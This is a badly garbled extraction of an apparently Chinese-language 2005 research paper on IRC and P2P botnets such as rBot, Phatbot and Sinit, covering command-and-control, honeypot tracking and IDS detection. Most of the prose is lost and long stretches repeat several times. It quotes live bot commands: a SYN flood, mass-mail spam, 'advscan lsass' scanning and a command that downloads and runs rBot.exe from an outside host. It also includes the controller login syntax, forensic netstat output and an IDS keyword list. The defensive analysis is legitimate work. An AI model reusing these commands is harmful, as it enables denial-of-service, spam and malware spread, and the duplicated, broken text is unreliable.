3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
->PRIVMSG rBot Download http://www.elitecoders.net/update.exe c:\rBot.exe 1
http://www.elitecoders.net update.exe c:\rBot.exe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmd.exe "netstat -an" IP
IP
135 445
fport.exe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server "TOPIC rBot advscan lsass 200 5 0 -r -s"
a
->TOPIC rBot advscan lsass 200 5 0 -r -s\n
b
->TOPIC rBot advscan lsass 200 5 0 -r -s\n
c) Botnet bot
<-:ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC rBot advscan lsass 200 5 0 -r -s\r\n
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 … ServN
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2) httpupdate http://server/rBot.exe c:\rBot.exe 1
server rBot.exe c 1
CNCERTCC TOPIC Bot
TOPIC "JOIN newchannel"
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
->PRIVMSG rbot login password -s\n
IP
2 bot
<-:ControllerNICK!ControllerUSER@host PRIVMSG rbot login password -s\r\n
1 2
IP Bot
host
IP
<-:ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG rbot login password -s\r\n
10.10.10.10 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
->PRIVMSG rbot password accepted\n
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Gnutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
c:\>netstat -an
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED
TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1
TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1
TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1
TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1
TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT
TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT
TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT
